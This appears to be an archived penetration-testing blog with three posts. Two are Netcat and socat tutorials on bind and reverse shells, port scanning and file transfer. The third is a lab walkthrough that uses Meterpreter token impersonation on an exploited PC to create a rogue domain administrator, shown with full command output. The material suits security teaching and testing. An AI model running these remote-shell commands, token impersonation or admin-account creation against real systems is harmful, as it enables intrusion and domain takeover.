Interactive shell – GoSecure!

From a non interactive shell to an interactive one

Peru — Tue, 18 Jun 2013 10:08:59 +0000

As you can read at the end of this post a remote shell using command execution (-e cmd.exe or /bin/bash) isn’t a full interactive command prompt.
These are solutions I found to have a more stable shell. Note that I don’t talk about a web remote shell as c99, c100, weevely or other php/asp code that need a web server. Also I don’t want to talk about MSFvenom and similar, but I focused on something similar to NC or SSH.

The target is a Linux system.
Using Pyton:
After you get a Netcat remote shell execute

python -c 'import pty; pty.spawn("/bin/bash");'

This is non completly interactive, but is better than before.

Is Better to use socat that is a more complex variant of netcat.
Listener:

socat file:`tty`,raw,echo=0 tcp-listen:8999

Client:

socat tcp:127.0.0.1:8999 exec:"bash -li",pty,stderr,setsid,sigint,sane

This is a full interactive remote shell

The target is a Windows system.
I suppose that in Microsoft environment you don’t have pyton or socat, although the two programs have Windows binary.
So the better way I found is to start a telnet server. Googling I found some stand alone programs like TelnetD. Note that isn’t a free software, but you can try it using the Trial Version.

Some tricks using Netcat

Peru — Mon, 17 Jun 2013 16:02:07 +0000

If you are here, I suppose you know that Netcat (NC) is an utility which reads and writes data across network connections, using TCP or UDP transport. Nothing more, nothing less.
Let’s see some exemples of use.
First of all let’s read the help output:

C:\>nc.exe -h
[v1.11 NT www.vulnwatch.org/netcat/]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [options] [hostname] [port]
options:
-d detach from console, background mode

-e prog inbound program to exec [dangerous!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-L listen harder, re-listen on socket close
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr local source address
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: m-n [inclusive]

This is the Windows version of Netcat, but options are similar also in Linux. The version I found for MacOS don’t have the -e option, but you can recompile it to enable this option or use some workaround as I will explain.

First try: open two command windows in the same machine. In the first window start a service that listens on a specific port using Netcat (this is called listener)

C:\>nc.exe -l -v -p 4444

If you have a look at the network connection of your machine, using the command netstat -na, you will find a listening connection on port 4444 tcp 0.0.0.0:4444 LISTEN
In the second window use NC as a client and connect to localhost on port 4444

C:\>nc.exe 127.0.0.1 4444 -v

Hit enter and you establish a simple connection with NC, but what is this?
Essentially is a simple chat. If in window 1 you write something it will redirect to windows 2 and vice versa.
So NC is a program that allows you to communicate using TCP or UDP protocols and you can use it whether as a client or as a server. TCP/UDP connections are more useful than a simple chat: you can use NC to test if a remote port is open, to grab information about a service listening on a remote PC (the banner) and to connect to this service; otherwise you can use it to redirect text, request html page, and, last but not least, remotely admin a PC.

Lets try NC to pass simple text file. This time I will use Linux because of its more simple command shell, but you can implement the same thing on Windows.
So, I try to pass text file starting the folowing listener

root@kali:~# nc -lvp 4444 > file.txt

…and than connect

root@kali:~# echo "This text will be transmitted using Netcat" | nc 127.0.0.1 4444

This can be useful to create or modify remotly config file as this:

root@kali:~# nc -lp 4444 >> /etc/proxychains.conf

root@kali:~# cat new_proxy_to_add.txt | nc 127.0.0.1 4444

…or simply add something to your TODO list

root@kali:~# nc -lp 4444 >> /doc/TODO.txt

root@kali:~# echo -e "Wash girlfriend car\nBuy beer\nDebug my friend app" | nc 127.0.0.1 4444

And now let’s transfer a file (note the -w option used to end connection and to unlock the file transferred):

root@kali:~# nc -lp 4444 < myfile.zip

root@kali:~# nc -w 1 127.0.0.1 4444 > myfile_renamed.zip

Well, NC can be used to connect to listeners. If there is a service listening on some TCP/UDP port you can try to connect, and sometimes even interact with it:

root@kali:~# nc 127.0.0.1 21
220 (vsFTPd 2.3.5)
USER user-one
331 Please specify the password.
PASS ******
230 Login successful.

In some other case NC isn’t able to interact, but can be useful to grub banner and find what kind of service is listening. Look at the following command: you find a OpenSSH server on non-standard tcp port 2201.

root@kali:~# nc -v 127.0.0.1 2201
localhost [127.0.0.1] 2201 (?) open
SSH-2.0-OpenSSH_6.0p1 Debian-4

Protocol mismatch.

You can implement this idea using -z option and transfotm NC in a port scanner. You will also like to specify port range.

root@kali:~# nc -zv 127.0.0.1 1-3000
localhost [127.0.0.1] 2201 (?) open
localhost [127.0.0.1] 1111 (?) open
localhost [127.0.0.1] 80 (http) open
localhost [127.0.0.1] 21 (ftp) open

If you use the -o option you can dump all hex traffic:

root@kali:~# nc 127.0.0.1 4444 -vo /tmp/log.txt
localhost [127.0.0.1] 4444 (?) open
hello
my password is ****** yes six asterisks
^C
root@kali:~# cat /tmp/log.txt
< 00000000 68 65 6c 6c 6f 0a # hello.
> 00000000 6d 79 20 70 61 73 73 77 6f 72 64 20 69 73 20 2a # my password is *
> 00000010 2a 2a 2a 2a 2a 20 79 65 73 20 73 69 78 20 61 73 # ***** yes six as
> 00000020 74 65 72 69 73 6b 73 0a # terisks.

Let’s now talk about remote admin. You can use -e option to execute programs, in this case cmd.exe or /bin/bash.
So, start a listener in one terminal window:

c:\>nc.exe -lvp 4444 -e cmd.exe
listening on [any] 4444 ...

…and connect to it using a second command shell:

c:\>nc.exe 127.0.0.1 4444
Microsoft Windows [Versione 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. Tutti i diritti riservati.

c:\>hostname
hostname
windows-pc01

c:\FAKE_Path>

You can also set the listener without -e option and use it on the client. The result will be a remore shell of the client on the machine with the listener.
Of course you can put together text/command redirection and command execution. Look at the immage below.

We have 3 PCs: machine A and B are Linux, machine C is Windows. Let’s start 2 listeners in two different windows in Machine A; then one listener with -e option on the Windows PC. When all listeners are ready let’s put all together running the 3 clients from Machine B. we wait some seconds and … TA-DAAA! In the Machine A we have a remote shell of the Windows system. Note that pipeling in Machine B has as effect that, in Machine A, you write the command in shell 1 and read output in shell 2.
This sound like a remote shell using a proxy…

Now let’s try the MacOS Netcat version. The only preconpiled version I found is an old one, non supporting “executing command” option (-e). Although we can compile a surce code that incluce the option we want, we can also modify the previous exemple to make command execution working.
Start on a machine (IP=10.0.0.1) two shell each one with a listener.

nc -lvp 4444

nc -lvp 3333

In the remote Mac you have to admin, start a pipeling as this:

user@mymac:~$ nc 10.0.0.1 4444 | /bin/bash | nc 10.0.0.1 3333

Great! You have a remote shell of your Mac.

That’s why netcat is so important. It is so simple and so powerful that you can use it either for basic connection tests or in a complex environment, but the most important thing is that is cross-platform, single file and stand-alone program. It can also be used to implement many complex environment as proxy, sniffer, logger, secure chat, debbugger, fuzzer. You can even use it backup your disk partition on another PC (how to copy compressed drive image over network).
Nowadays there are many Netcat clones, some of these use encryption or implement the remote command execution and the use of passwords; you can easely find it googling.

Obviously not always it work as we’ll wish. One exemple overall: when we start a remote shell using NC with -e option we don’t have a FULL interactive command prompt, but a NON interactive one. To better understand try this: connect to an FTP server using NC directly. You will prompt to insert USER and then PASS and everything works, but if you try to connect to the FTP server from a remote shell (using NC aswell) you will promt to insert USER and, when you hit enter, your session will hang.
In this post you can find some solutions to reach a full interactive shell from a NC non interactive shell.

You can find more info on NetCat Home Page.

Create a domain user admin through an exploited PC

Peru — Tue, 07 May 2013 17:35:10 +0000

The server and pc hardening is the process of securing a system, limiting the surface that can be attacked. One of its role is to limitate the use of amministrative right.
Nowadays users have to use an unprivileged accounts, also sysadmins have to remind this role when configuring service and scripts.
Sometimes, to let centralized software to work correctly, sysadmins install client agents to work with high privileged account and this can be used to scalate privileges.
This is how to create a domain user admin through an exploited domain PC with local machine administration rights.

The domain is called LAB.local based on Windows 2008R2. LABServer07 is the primary DC.
The exploited machine is joined to the domain and we got a Meterpreter shell with local PC admin rights.

Basic command used after exploit:
Find process –> meterpreter > ps
Load incognito extension –> meterpreter > use incognito
Listing available tokens –> meterpreter > list_tokens -u
Impersonate token –> meterpreter > impersonate_token
Get a command shell using the token –> meterpreter > execute -f cmd.exe -i -t -H -c
Add a domain User –> C:\WINDOWS\system32>net user USER PASSWORD /add /domain
Add the creted user in domain admin –> C:\WINDOWS\system32>net localgroup administrators USER /add /domain

Interact with session 1 and list process:

msf exploit(psexec) > sessions -i 1[*] Starting interaction with 1...

meterpreter > ps

Process list
============

PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System x86 0 NT AUTHORITY\SYSTEM
1736 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
1788 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
1812 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
1856 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
1868 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
2032 ibmpmsvc.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\ibmpmsvc.exe
176 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
312 svchost.exe x86 0 NT AUTHORITY\SERVIZIO DI RETE C:\WINDOWS\system32\svchost.exe
404 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
508 EvtEng.exe x86 0 NT AUTHORITY\SYSTEM C:\Programmi\Intel\Wireless\Bin\EvtEng.exe
604 S24EvMon.exe x86 0 NT AUTHORITY\SYSTEM C:\Programmi\Intel\Wireless\Bin\S24EvMon.exe
824 svchost.exe x86 0 NT AUTHORITY\SERVIZIO DI RETE C:\WINDOWS\system32\svchost.exe
848 svchost.exe x86 0 NT AUTHORITY\SERVIZIO LOCALE C:\WINDOWS\system32\svchost.exe
1228 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1304 svchost.exe x86 0 NT AUTHORITY\SERVIZIO LOCALE C:\WINDOWS\system32\svchost.exe
1344 AcPrfMgrSvc.exe x86 0 NT AUTHORITY\SYSTEM C:\Programmi\ThinkPad\ConnectUtilities\AcPrfMgrSvc.exe
1416 btwdins.exe x86 0 NT AUTHORITY\SYSTEM C:\Programmi\ThinkPad\Bluetooth Software\bin\btwdins.exe
1484 RegSrvc.exe x86 0 NT AUTHORITY\SYSTEM C:\Programmi\Intel\Wireless\Bin\RegSrvc.exe
1676 TpKmpSvc.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\TpKmpSVC.exe
180 AcSvc.exe x86 0 NT AUTHORITY\SYSTEM C:\Programmi\ThinkPad\ConnectUtilities\AcSvc.exe
700 MOMService.exe x86 0 NT AUTHORITY\SYSTEM C:\Programmi\Microsoft Forefront\Client Security\Client\Microsoft Operations Manager 2005\MOMService.exe
224 wmiprvse.exe x86 0 NT AUTHORITY\SERVIZIO DI RETE C:\WINDOWS\system32\wbem\wmiprvse.exe
948 SvcGuiHlpr.exe x86 0 NT AUTHORITY\SYSTEM C:\Programmi\ThinkPad\ConnectUtilities\SvcGuiHlpr.exe
2580 alg.exe x86 0 NT AUTHORITY\SERVIZIO LOCALE C:\WINDOWS\System32\alg.exe
3276 explorer.exe x86 0 LAB\utente1 C:\WINDOWS\Explorer.EXE
3908 tp4mon.exe x86 0 LAB\utente1 C:\WINDOWS\system32\tp4mon.exe
1112 igfxtray.exe x86 0 LAB\utente1 C:\WINDOWS\system32\igfxtray.exe
1124 hkcmd.exe x86 0 LAB\utente1 C:\WINDOWS\system32\hkcmd.exe
2192 igfxpers.exe x86 0 LAB\utente1 C:\WINDOWS\system32\igfxpers.exe
1860 ACTray.exe x86 0 LAB\utente1 C:\Programmi\ThinkPad\ConnectUtilities\ACTray.exe
2596 ACWLIcon.exe x86 0 LAB\utente1 C:\Programmi\ThinkPad\ConnectUtilities\ACWLIcon.exe
2700 smax4pnp.exe x86 0 LAB\utente1 C:\Programmi\Analog Devices\Core\smax4pnp.exe
2904 ctfmon.exe x86 0 LAB\utente1 C:\WINDOWS\system32\ctfmon.exe
3076 BTTray.exe x86 0 LAB\utente1 C:\Programmi\ThinkPad\Bluetooth Software\BTTray.exe
3572 cmd.exe x86 0 LAB\admin C:\WINDOWS\system32\cmd.exe <---------- Look at these
2912 cmd.exe x86 0 LAB\admin C:\WINDOWS\system32\cmd.exe <---------- Look at these
1472 rundll32.exe x86 0 LAB\admin C:\WINDOWS\system32\rundll32.exe <---------- Look at these
1256 cmd.exe x86 0 LAB\admin C:\WINDOWS\system32\cmd.exe <---------- Look at these
3044 msiexec.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\msiexec.exe
3224 rundll32.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\rundll32.exe

Load extension, list token and impersonate domain admin:

meterpreter > use incognito
Loading extension incognito...success.
meterpreter > list_tokens -u

Delegation Tokens Available
========================================
LAB\admin
LAB\utente1
NT AUTHORITY\SERVIZIO DI RETE
NT AUTHORITY\SERVIZIO LOCALE
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
========================================
NT AUTHORITY\ACCESSO ANONIMO

meterpreter > impersonate_token lab\\admin <---------- Double backslash DOMAIN\\name
[+] Delegation token available
[+] Successfully impersonated user LAB\admin

meterpreter > getuid
Server username: lab\admin

Get a domain admin shell:

meterpreter > execute -f cmd.exe -i -t -H -c
Process 3804 created.
Channel 1 created.
Microsoft Windows XP [Versione 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Create new domain user and join to the domain admins group:

C:\WINDOWS\system32>net user TestUser Passw0rd /add /domain
net user TestUser Passw0rd /add /domain
La richiesta verrà elaborata dal controller di dominio per il dominio lab.local.

Esecuzione comando riuscita.

C:\WINDOWS\system32>net localgroup /domain
net localgroup /domain
La richiesta verrà elaborata dal controller di dominio per il dominio lab.local.

Alias per \\LABServer07.lab.local

-------------------------------------------------------------------------------
*Accesso compatibile precedente a Windows 2000
*Accesso DCOM a Servizi certificati
*Account Operators
*Administrators
*Backup Operators
*Cert Publishers
*Cryptographic Operators
*Distributed COM Users
*DnsAdmins
*Gruppo di accesso autorizzazione Windows
*Guests
*IIS_IUSRS
*Incoming Forest Trust Builders
*Lettori registri eventi
*Network Configuration Operators
*Ogg. autorizzati a replica passw. in controller sola lettura
*Ogg. non autoriz. a replica passw. in controller sola lettura
*Performance Log Users
*Performance Monitor Users
*Print Operators
*Replicator
*Server licenze di Terminal Server
*Server Operators
*Server RAS e IAS
*Users
*Utenti desktop remoto
Esecuzione comando riuscita.

C:\WINDOWS\system32>net localgroup administrators TestUser /add /domain
net localgroup administrators TestUser /add /domain
La richiesta verrà elaborata dal controller di dominio per il dominio lab.local.

Esecuzione comando riuscita.

Obviously the victim PC is an Italian version, “esecuzione comando riuscita” means “Command completed successfully”